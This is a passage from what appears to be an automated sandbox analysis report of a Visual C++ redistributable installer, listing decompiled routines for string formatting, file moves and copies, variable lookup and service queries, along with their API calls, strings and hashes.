								_t49 = 0 | _a24 == 0x00000000;
								_t61 = E00032FF9(_v8,  &_v12, _a24 == 0);
								if(_t61 < 0) {
									_push("Failed to escape string.");
									goto L21;
								} else {
									_push(_v12);
									_t61 = E00018260(_t49,  &_v16, L" %s%=\"%s\"",  *((intOrPtr*)(_t59 - 8)));
									_t62 = _t62 + 0x14;
									if(_t61 < 0) {
										_push("Failed to format property string part.");
										goto L21;
									} else {
										_t61 = E0001823E(_t49, _a20, _v16, 0);
										if(_t61 < 0) {
											_push("Failed to append property string part.");
											L21:
											_push(_t61);
											E0005012F();
										} else {
											goto L15;
										}
									}
								}
							}
						}
						L22:
						goto L23;
						L15:
						_t59 = _t59 + 0xc;
						_t55 = _v20 + 1;
						_push(0);
						_v20 = _t55;
						_pop(0);
					} while (_t55 < _a8);
					goto L22;
				}
				L23:
				E00012793(_v8);
				E00012793(_v12);
				E00012793(_v16);
				return _t61;
			}











                                                                          0x00033759
                                                                          0x0003375b
                                                                          0x0003375e
                                                                          0x00033761
                                                                          0x00033764
                                                                          0x0003376a
                                                                          0x00033774
                                                                          0x00033778
                                                                          0x0003377c
                                                                          0x000337a3
                                                                          0x000337ab
                                                                          0x000337ab
                                                                          0x000337a5
                                                                          0x000337a5
                                                                          0x000337a9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000337a9
                                                                          0x000337bc
                                                                          0x000337c0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003377e
                                                                          0x00033782
                                                                          0x0003378a
                                                                          0x0003378a
                                                                          0x00033784
                                                                          0x00033784
                                                                          0x00033788
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00033788
                                                                          0x0003379b
                                                                          0x000337c2
                                                                          0x000337c4
                                                                          0x00033840
                                                                          0x00033840
                                                                          0x00000000
                                                                          0x000337c6
                                                                          0x000337ce
                                                                          0x000337db
                                                                          0x000337df
                                                                          0x00033839
                                                                          0x00000000
                                                                          0x000337e1
                                                                          0x000337e1
                                                                          0x000337f6
                                                                          0x000337f8
                                                                          0x000337fd
                                                                          0x00033832
                                                                          0x00000000
                                                                          0x000337ff
                                                                          0x0003380d
                                                                          0x00033811
                                                                          0x0003382b
                                                                          0x00033845
                                                                          0x00033845
                                                                          0x00033846
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00033811
                                                                          0x000337fd
                                                                          0x000337df
                                                                          0x000337c4
                                                                          0x0003384d
                                                                          0x00000000
                                                                          0x00033813
                                                                          0x00033816
                                                                          0x00033819
                                                                          0x0003381d
                                                                          0x0003381f
                                                                          0x00033822
                                                                          0x00033822
                                                                          0x00000000
                                                                          0x00033829
                                                                          0x0003384f
                                                                          0x00033852
                                                                          0x0003385a
                                                                          0x00033862
                                                                          0x0003386d

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000337B7
                                                                          Strings
                                                                          • Failed to format property string part., xrefs: 00033832
                                                                          • Failed to format property value., xrefs: 00033840
                                                                          • Failed to escape string., xrefs: 00033839
                                                                          • %s%="%s", xrefs: 000337EA
                                                                          • Failed to append property string part., xrefs: 0003382B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                          • API String ID: 3613110473-515423128
                                                                          • Opcode ID: f950661a150ae598639585b01f9f71c472d00f1b8715afa3e83dd4b9029dfc0a
                                                                          • Instruction ID: 9acb1051af2c664bf11bc8de65be40b22c8bf3e922cf8c532479a31f03160ac4
                                                                          • Opcode Fuzzy Hash: f950661a150ae598639585b01f9f71c472d00f1b8715afa3e83dd4b9029dfc0a
                                                                          • Instruction Fuzzy Hash: 0931B3B2905216FFDB269F94CC82EEEB7BDEF00B10F10416AF90166242DB719F509B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000540C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 97%
                                                                          			E000540C8(WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, long _a16) {
				short _t20;
				WCHAR* _t25;
				long _t28;
				WCHAR* _t29;
				signed short _t32;
				short* _t34;
				short* _t35;

				_t25 = _a8;
				_t35 = 0;
				_t28 =  ==  ? 0 | _a12 != 0x00000000 : 0 | _a12 != 0x00000000 | 0x00000002;
				_a16 = _t28;
				if(MoveFileExW(_a4, _t25, _t28) != 0) {
					L20:
					return _t35;
				}
				_t32 = GetLastError();
				if(_a12 != 0 || _t32 != 0x50 && _t32 != 0xb7) {
					if(_t32 != 2) {
						L8:
						if(_t32 != 3) {
							L18:
							_t35 =  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
							goto L19;
						}
						_t34 = _t35;
						_t29 = _t25;
						if(( *_t25 & 0x0000ffff) == 0) {
							L17:
							_t35 = 0x80070003;
							goto L19;
						}
						_push(0x5c);
						do {
							_t34 =  ==  ? _t29 : _t34;
							_t29 =  &(_t29[1]);
						} while (( *_t29 & 0x0000ffff) != 0);
						if(_t34 == 0) {
							goto L17;
						}
						 *_t34 = 0;
						_t35 = E00014013(_t25, _t35);
						_t20 = 0x5c;
						 *_t34 = _t20;
						if(_t35 >= 0 && MoveFileExW(_a4, _t25, _a16) == 0) {
							_t35 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
							if(_t35 < 0) {
								E000137D3(_t22, "fileutil.cpp", 0x4cc, _t35);
							}
						}
						goto L19;
					}
					if(E00054315(_a4, _t35) == 0) {
						goto L18;
					}
					_t32 = 3;
					goto L8;
				} else {
					_t35 = 1;
					L19:
					goto L20;
				}
			}










                                                                          0x000540cc
                                                                          0x000540d2
                                                                          0x000540e2
                                                                          0x000540ea
                                                                          0x000540f5
                                                                          0x000541c9
                                                                          0x000541ce
                                                                          0x000541ce
                                                                          0x00054102
                                                                          0x00054107
                                                                          0x00054121
                                                                          0x00054137
                                                                          0x0005413a
                                                                          0x000541ba
                                                                          0x000541c5
                                                                          0x00000000
                                                                          0x000541c5
                                                                          0x0005413f
                                                                          0x00054141
                                                                          0x00054146
                                                                          0x000541b3
                                                                          0x000541b3
                                                                          0x00000000
                                                                          0x000541b3
                                                                          0x00054148
                                                                          0x0005414b
                                                                          0x0005414e
                                                                          0x00054151
                                                                          0x00054157
                                                                          0x0005415e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054164
                                                                          0x0005416c
                                                                          0x00054170
                                                                          0x00054171
                                                                          0x00054176
                                                                          0x0005419a
                                                                          0x0005419f
                                                                          0x000541ac
                                                                          0x000541ac
                                                                          0x0005419f
                                                                          0x00000000
                                                                          0x00054176
                                                                          0x0005412e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054136
                                                                          0x00000000
                                                                          0x00054116
                                                                          0x00054118
                                                                          0x000541c8
                                                                          0x00000000
                                                                          0x000541c8

                                                                          APIs
                                                                          • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000), ref: 000540ED
                                                                          • GetLastError.KERNEL32(00000001,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000,000007D0,00000001,00000001,00000003), ref: 000540FC
                                                                          • MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000), ref: 0005417F
                                                                          • GetLastError.KERNEL32(?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000,000007D0,00000001,00000001,00000003,000007D0), ref: 00054189
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 55378915-2299628883
                                                                          • Opcode ID: 8db2ef67cec1a6da698d44cbc15b65c296486b779a3d127f2b9415c098886caf
                                                                          • Instruction ID: 2bb33074908a0a910b402d2bd5f0aaf82fd7c6e99fce5fa0aa3555ef1613bd39
                                                                          • Opcode Fuzzy Hash: 8db2ef67cec1a6da698d44cbc15b65c296486b779a3d127f2b9415c098886caf
                                                                          • Instruction Fuzzy Hash: 73212636A40B369BEB211E648C816FF76D8EF607A7F020126FD0597190DB318CC5C2E8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00017203 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 42%
                                                                          			E00017203(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t29;
				char* _t38;
				signed int _t46;
				void* _t49;

				_t41 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t29 = E00015C87(_t41, _a4, _a8,  &_v12);
				_t46 = _v12;
				_t49 = _t29;
				if(_t49 < 0 ||  *((intOrPtr*)(_t46 + 0x18)) != 0) {
					if(_t49 == 0x80070490) {
						goto L18;
					}
					if(_t49 >= 0) {
						if( *((intOrPtr*)(_t46 + 0x18)) != 2 ||  *((intOrPtr*)(_t46 + 0x2c)) != 0 ||  *((intOrPtr*)(_t46 + 0x24)) != 0) {
							_t24 = _t46 + 8; // 0x8
							_t49 = E000300E0(_t24, _a12);
							if(_t49 >= 0) {
								goto L18;
							}
							_push(_a8);
							_push("Failed to get value as string for variable: %ls");
							L17:
							_push(_t49);
							E0005012F();
						} else {
							_t16 = _t46 + 8; // 0x8
							_t49 = E000300E0(_t16,  &_v8);
							if(_t49 >= 0) {
								_t49 = E0001567D(_a4, _v8, _a12, 0, 0);
								if(_t49 < 0) {
									_t38 = L"*****";
									if( *((intOrPtr*)(_t46 + 0x20)) == 0) {
										_t38 =  *(_t46 + 8);
									}
									_push(_a8);
									E0005012F(_t49, "Failed to format value \'%ls\' of variable: %ls", _t38);
								}
							} else {
								_push("Failed to get unformatted string.");
								_push(_t49);
								E0005012F();
							}
						}
						goto L18;
					}
					_push(_a8);
					_push("Failed to get variable: %ls");
					goto L17;
				} else {
					_t49 = 0x80070490;
					L18:
					LeaveCriticalSection(_a4);
					E00012793(_v8);
					return _t49;
				}
			}









                                                                          0x00017203
                                                                          0x00017206
                                                                          0x00017207
                                                                          0x00017208
                                                                          0x0001720c
                                                                          0x00017215
                                                                          0x00017225
                                                                          0x0001722a
                                                                          0x0001722d
                                                                          0x00017231
                                                                          0x00017249
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017251
                                                                          0x00017264
                                                                          0x000172d1
                                                                          0x000172da
                                                                          0x000172de
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000172e0
                                                                          0x000172e3
                                                                          0x000172e8
                                                                          0x000172e8
                                                                          0x000172e9
                                                                          0x00017272
                                                                          0x00017275
                                                                          0x0001727f
                                                                          0x00017283
                                                                          0x000172a6
                                                                          0x000172aa
                                                                          0x000172b0
                                                                          0x000172b5
                                                                          0x000172b7
                                                                          0x000172b7
                                                                          0x000172ba
                                                                          0x000172c4
                                                                          0x000172c9
                                                                          0x00017285
                                                                          0x00017285
                                                                          0x0001728a
                                                                          0x0001728b
                                                                          0x00017291
                                                                          0x00017283
                                                                          0x00000000
                                                                          0x00017264
                                                                          0x00017253
                                                                          0x00017256
                                                                          0x00000000
                                                                          0x00017239
                                                                          0x00017239
                                                                          0x000172f1
                                                                          0x000172f4
                                                                          0x000172fd
                                                                          0x00017309
                                                                          0x00017309

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,0001583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 00017215
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,0001583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000172F4
                                                                          Strings
                                                                          • Failed to get variable: %ls, xrefs: 00017256
                                                                          • Failed to get unformatted string., xrefs: 00017285
                                                                          • *****, xrefs: 000172B0, 000172BD
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000172E3
                                                                          • Failed to format value '%ls' of variable: %ls, xrefs: 000172BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                          • API String ID: 3168844106-2873099529
                                                                          • Opcode ID: a789c5f7b57861908e1eeac543f683df972e47f3b65ba40e66e101f7592e9f74
                                                                          • Instruction ID: 6f4325ac6b16d2dceb68ec2ec665a41924e2e9380e5045a91fbc960887f9e734
                                                                          • Opcode Fuzzy Hash: a789c5f7b57861908e1eeac543f683df972e47f3b65ba40e66e101f7592e9f74
                                                                          • Instruction Fuzzy Hash: 1D31C032904A1ABFDF225A50CC02FDE7B74EF15325F104125FD086A151D736AAD6DBC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053F04 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00053F04(WCHAR* _a4, WCHAR* _a8, int _a12) {
				signed short _t12;
				short _t16;
				WCHAR* _t20;
				WCHAR* _t21;
				int _t23;
				short* _t24;
				short* _t25;

				_t20 = _a8;
				_t23 = _a12;
				_t25 = 0;
				if(CopyFileW(_a4, _t20, 0 | _t23 == 0x00000000) != 0) {
					L16:
					return _t25;
				}
				_t12 = GetLastError();
				if(_t23 != 0 || _t12 != 0x50 && _t12 != 0xb7) {
					if(_t12 != 3) {
						_t25 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
						goto L16;
					}
					_t24 = _t25;
					_t21 = _t20;
					if(( *_t20 & 0x0000ffff) == 0) {
						L14:
						_t25 = 0x80070003;
						goto L16;
					}
					_push(0x5c);
					do {
						_t24 =  ==  ? _t21 : _t24;
						_t21 =  &(_t21[1]);
					} while (( *_t21 & 0x0000ffff) != 0);
					if(_t24 == 0) {
						goto L14;
					}
					 *_t24 = 0;
					_t25 = E00014013(_t20, _t25);
					_t16 = 0x5c;
					 *_t24 = _t16;
					if(_t25 >= 0 && CopyFileW(_a4, _t20, _a12) == 0) {
						_t25 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
						if(_t25 < 0) {
							E000137D3(_t18, "fileutil.cpp", 0x44c, _t25);
						}
					}
				} else {
					_t25 = 1;
				}
			}










                                                                          0x00053f08
                                                                          0x00053f0f
                                                                          0x00053f12
                                                                          0x00053f26
                                                                          0x00053fdc
                                                                          0x00053fe1
                                                                          0x00053fe1
                                                                          0x00053f2c
                                                                          0x00053f34
                                                                          0x00053f4d
                                                                          0x00053fd8
                                                                          0x00000000
                                                                          0x00053fd8
                                                                          0x00053f52
                                                                          0x00053f54
                                                                          0x00053f59
                                                                          0x00053fc6
                                                                          0x00053fc6
                                                                          0x00000000
                                                                          0x00053fc6
                                                                          0x00053f5b
                                                                          0x00053f5e
                                                                          0x00053f61
                                                                          0x00053f64
                                                                          0x00053f6a
                                                                          0x00053f71
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053f77
                                                                          0x00053f7f
                                                                          0x00053f83
                                                                          0x00053f84
                                                                          0x00053f89
                                                                          0x00053fad
                                                                          0x00053fb2
                                                                          0x00053fbf
                                                                          0x00053fbf
                                                                          0x00053fb2
                                                                          0x00053f42
                                                                          0x00053f44
                                                                          0x00053f44

                                                                          APIs
                                                                          • CopyFileW.KERNEL32(00000000,00014CB6,00000000,?,?,00000000,?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?), ref: 00053F1E
                                                                          • GetLastError.KERNEL32(?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00053F2C
                                                                          • CopyFileW.KERNEL32(00000000,00014CB6,00000000,00014CB6,00000000,?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001), ref: 00053F92
                                                                          • GetLastError.KERNEL32(?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00053F9C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CopyErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 374144340-2299628883
                                                                          • Opcode ID: fdf23d50b39fa2a94303085dd5d1705518fd7ad2fb6a0185c56f415990e444dd
                                                                          • Instruction ID: 7cc62f6b007efe00ddf463fef721e953bd57f4345f78d16d98e97af15c2839f5
                                                                          • Opcode Fuzzy Hash: fdf23d50b39fa2a94303085dd5d1705518fd7ad2fb6a0185c56f415990e444dd
                                                                          • Instruction Fuzzy Hash: 8121C336E44736AAEB301E654C44B7BB6E8EF40BE2B164436FD05DB150D725CE0583E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000155B6 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E000155B6(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr* _a12) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _t17;
				signed int _t18;
				void* _t22;
				void* _t23;
				signed int _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				unsigned int _t43;
				intOrPtr _t46;

				_t37 = _a4;
				_t43 =  *(_t37 + 0x1c);
				_t46 = 0;
				_t33 = 0;
				if(_t43 == 0) {
					L10:
					_t46 = 1;
					 *_a12 = _t33;
				} else {
					while(1) {
						_t17 = _t43 >> 1;
						_v8 = _t17;
						_t18 = _t17 + _t33;
						_v12 = _t18;
						_t22 = CompareStringW(0x7f, 0x1000, _a8, 0xffffffff,  *(_t18 * 0x38 +  *((intOrPtr*)(_t37 + 0x20))), 0xffffffff) - 1;
						if(_t22 == 0) {
							goto L5;
						}
						_t23 = _t22 - 1;
						if(_t23 == 0) {
							 *_a12 = _v8 + _t33;
						} else {
							_t25 = _t23 - 1;
							if(_t25 != 0) {
								_t51 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
								_t46 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "variable.cpp", 0x59f, _t46);
								_push("Failed to compare strings.");
								_push(_t46);
								E0005012F();
							} else {
								_t33 = _v12 + 1;
								_t43 = _t43 + (_t25 | 0xffffffff) - _v8;
								L6:
								if(_t43 == 0) {
									goto L10;
								} else {
									_t37 = _a4;
									continue;
								}
							}
						}
						goto L11;
						L5:
						_t43 = _v8;
						goto L6;
					}
				}
				L11:
				return _t46;
			}














                                                                          0x000155bb
                                                                          0x000155c1
                                                                          0x000155c4
                                                                          0x000155c6
                                                                          0x000155ca
                                                                          0x0001566a
                                                                          0x0001566f
                                                                          0x00015670
                                                                          0x00000000
                                                                          0x000155d0
                                                                          0x000155d2
                                                                          0x000155d4
                                                                          0x000155d7
                                                                          0x000155d9
                                                                          0x000155f8
                                                                          0x000155fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000155fd
                                                                          0x00015600
                                                                          0x00015666
                                                                          0x00015602
                                                                          0x00015602
                                                                          0x00015605
                                                                          0x00015632
                                                                          0x0001563c
                                                                          0x0001564a
                                                                          0x0001564f
                                                                          0x00015654
                                                                          0x00015655
                                                                          0x00015607
                                                                          0x00015610
                                                                          0x00015611
                                                                          0x00015618
                                                                          0x0001561a
                                                                          0x00000000
                                                                          0x0001561c
                                                                          0x0001561c
                                                                          0x00000000
                                                                          0x0001561c
                                                                          0x0001561a
                                                                          0x00015605
                                                                          0x00000000
                                                                          0x00015615
                                                                          0x00015615
                                                                          0x00000000
                                                                          0x00015615
                                                                          0x000155d0
                                                                          0x00015672
                                                                          0x0001567a

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0001648B,0001648B,?,0001554A,?,?,00000000), ref: 000155F2
                                                                          • GetLastError.KERNEL32(?,0001554A,?,?,00000000,?,00000000,0001648B,?,00017DDC,?,?,?,?,?), ref: 00015621
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareErrorLastString
                                                                          • String ID: @Met$Failed to compare strings.$variable.cpp$version.dll
                                                                          • API String ID: 1733990998-3869666919
                                                                          • Opcode ID: 58f7573e7aa53dbb203adc5c7e2a138c3c2a2076870297f24582149631069c48
                                                                          • Instruction ID: 68e119e2b112d17a6b4a4aa38d58bed9c0425eb639d7f1647de829454c8c9c7e
                                                                          • Opcode Fuzzy Hash: 58f7573e7aa53dbb203adc5c7e2a138c3c2a2076870297f24582149631069c48
                                                                          • Instruction Fuzzy Hash: 34210432600A14EFD7108FA88C41AAAB7E4EF89762F610319ED14EF2D0DA30EE4186D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000557BF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E000557BF(void* __ecx, void* _a4, struct _QUERY_SERVICE_CONFIG** _a8) {
				int _v8;
				signed short _t14;
				struct _QUERY_SERVICE_CONFIG* _t24;
				struct _QUERY_SERVICE_CONFIG* _t25;
				struct _QUERY_SERVICE_CONFIG* _t28;

				_t28 = 0;
				_t24 = 0;
				_v8 = 0;
				if(QueryServiceConfigW(_a4, 0, 0,  &_v8) != 0) {
					L9:
					 *_a8 = _t24;
					_t25 = _t28;
					L10:
					if(_t25 != 0) {
						E00013999(_t25);
					}
					L12:
					return _t28;
				}
				_t14 = GetLastError();
				if(_t14 != 0x7a) {
					if(_t14 == 0) {
						goto L9;
					}
					_t32 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
					_t28 =  >=  ? 0x80004005 :  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
					_push(_t28);
					_push(0x21);
					L4:
					_push("svcutil.cpp");
					E000137D3(0x80004005);
					goto L12;
				}
				_t24 = E000138D4(_v8, 1);
				if(_t24 != 0) {
					if(QueryServiceConfigW(_a4, _t24, _v8,  &_v8) != 0) {
						goto L9;
					}
					_t35 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
					_t28 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "svcutil.cpp", 0x1c, _t28);
					goto L10;
				}
				_t28 = 0x8007000e;
				_push(0x8007000e);
				_push(0x18);
				goto L4;
			}








                                                                          0x000557c5
                                                                          0x000557d0
                                                                          0x000557d2
                                                                          0x000557dd
                                                                          0x00055875
                                                                          0x00055878
                                                                          0x0005587a
                                                                          0x0005587c
                                                                          0x0005587e
                                                                          0x00055881
                                                                          0x00055881
                                                                          0x00055886
                                                                          0x0005588d
                                                                          0x0005588d
                                                                          0x000557e3
                                                                          0x000557ec
                                                                          0x00055856
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055863
                                                                          0x0005586d
                                                                          0x00055870
                                                                          0x00055871
                                                                          0x00055806
                                                                          0x00055806
                                                                          0x0005580b
                                                                          0x00000000
                                                                          0x0005580b
                                                                          0x000557f8
                                                                          0x000557fc
                                                                          0x00055825
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055838
                                                                          0x00055842
                                                                          0x0005584d
                                                                          0x00000000
                                                                          0x0005584d
                                                                          0x000557fe
                                                                          0x00055803
                                                                          0x00055804
                                                                          0x00000000

                                                                          APIs
                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,000368CE,00000000,?), ref: 000557D5
                                                                          • GetLastError.KERNEL32(?,?,000368CE,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?), ref: 000557E3
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,000368CE,00000000,?), ref: 0005581D
                                                                          • GetLastError.KERNEL32(?,?,000368CE,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?), ref: 00055827
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                          • String ID: @Met$svcutil.cpp
                                                                          • API String ID: 355237494-2661668335
                                                                          • Opcode ID: 48cf5e687842e0ec1047fc0ba68d801ce25e5e8158e101c70c48b3c5ed4ab8bc
                                                                          • Instruction ID: f0237227e0940b62a3fbd39093d8dd089a677ab2c856619dd58bf1b3fdc632ba
                                                                          • Opcode Fuzzy Hash: 48cf5e687842e0ec1047fc0ba68d801ce25e5e8158e101c70c48b3c5ed4ab8bc
                                                                          • Instruction Fuzzy Hash: 2121D536A40724BBE7309A968D04BFB7ADCDF44792F110115FD05FB150EE65CD0496E0
                                                                          Uniqueness

